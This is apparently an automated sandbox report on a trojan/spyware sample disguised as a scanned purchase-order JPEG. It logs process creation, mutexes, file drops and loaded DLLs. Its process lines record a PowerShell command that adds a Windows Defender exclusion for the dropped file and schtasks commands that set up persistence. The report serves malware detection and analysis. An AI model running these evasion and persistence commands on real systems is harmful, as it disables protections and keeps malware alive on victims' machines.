                  Source: HJnkiZjAPsec.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, nhtqyFvX8yKhXJY77Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, nhtqyFvX8yKhXJY77Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/11@4/4
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeFile created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMutant created: \Sessions\1\BaseNamedObjects\QmQWkgusceIGVbkjV
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB8C6.tmpJump to behavior
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeReversingLabs: Detection: 50%
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeFile read: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: version.dll
